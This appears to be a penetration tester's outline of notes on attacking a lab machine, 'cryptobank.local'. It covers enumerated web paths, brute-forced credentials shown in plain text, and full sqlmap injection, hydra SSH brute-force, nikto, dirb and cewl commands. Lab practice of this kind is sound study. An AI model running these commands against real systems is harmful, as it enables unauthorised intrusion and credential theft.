1. http p80
1.1. /
1.1.1. robots.txt
1.1.1.1. ❌
1.2. /development
1.2.1. login (basic auth)
1.2.1.1. (hydra) u: julius.b p: wJWm4CgV26
1.2.1.1.1. /tools
1.2.1.1.2. /backups
1.2.1.1.3. sqlmap -u "http://cryptobank.local/development/tools/FileInclusion/pages/fetchmeafile.php?file=file.txt" --auth-type "BASIC" --auth-cred="julius.b:wJWm4CgV26" --dbs
1.3. /trade
1.3.1. login (form)
1.4. /ninjafirewall
1.4.1. login (form)
1.4.1.1. burpsuite
1.4.1.1.1. ❌
1.4.2. exploits
1.4.2.1. ❌
1.4.2.1.1. metasploit
1.4.2.1.2. exploit-db
1.4.2.1.3. searchsploit
1.4.3. /lib
1.4.4. /INSTALL.TXT
1.4.4.1. ======================================================================== To install a new copy of NinjaFirewall: 1. Create a new directory and upload all files from this package. 2. Goto http://YOUR_SITE/NEW_DIRECTORY/install.php 3. Follow the setup assistant. ======================================================================== To uninstall NinjaFirewall: 1. Remove any instructions added to your PHP INI and/or .htaccess files during the installation process. 2. Delete all files from the NinjaFirewall folder. ========================================================================
1.4.5. /install.php
1.4.6. ? /conf/options.php
1.5. sqlmap -r peticion.txt -D cryptobank --tables --batch
1.5.1. accounts
1.5.1.1. ✔
1.5.2. comments
1.5.2.1. ✔
1.5.3. loans
1.5.3.1. jpgs
1.5.3.1.1. ❓
1.6. Cookie: PHPSESSID=9lveoop3k64qahmjpi4qga4qbn
1.7. nikto
1.7.1. nikto -h http://cryptobank.local/development/ -id julius.d:wJWm4CgV26 -Tuning x -o nikto_dev.txt
1.7.1.1. ✔
1.7.2. nikto -h http://cryptobank.local/firewall/ -Tuning x -o nikto_fw.txt
1.7.2.1. ✔
1.8. dirb
1.8.1. dirb http://cryptobank.local/development /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u julius.b:wJWm4CgV26 -o dirb_dev.txt -w
1.8.1.1. ✔
1.8.2. dirb http://cryptobank.local/firewall /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o dirb_fw.txt -w
1.8.2.1. ⏳
2. ssh p22
2.1. u: julius.b p: wJWm4CgV26
2.1.1. ❌
2.2. cewl cryptobank.local --auth_type basic --auth_user julius.b --auth_pass wJWm4CgV26 -m 5 -w cewl_pwd.txt
2.2.1. hydra -L crypto_usr.txt -P cewl_pwd.txt 192.168.10.133 ssh -t 4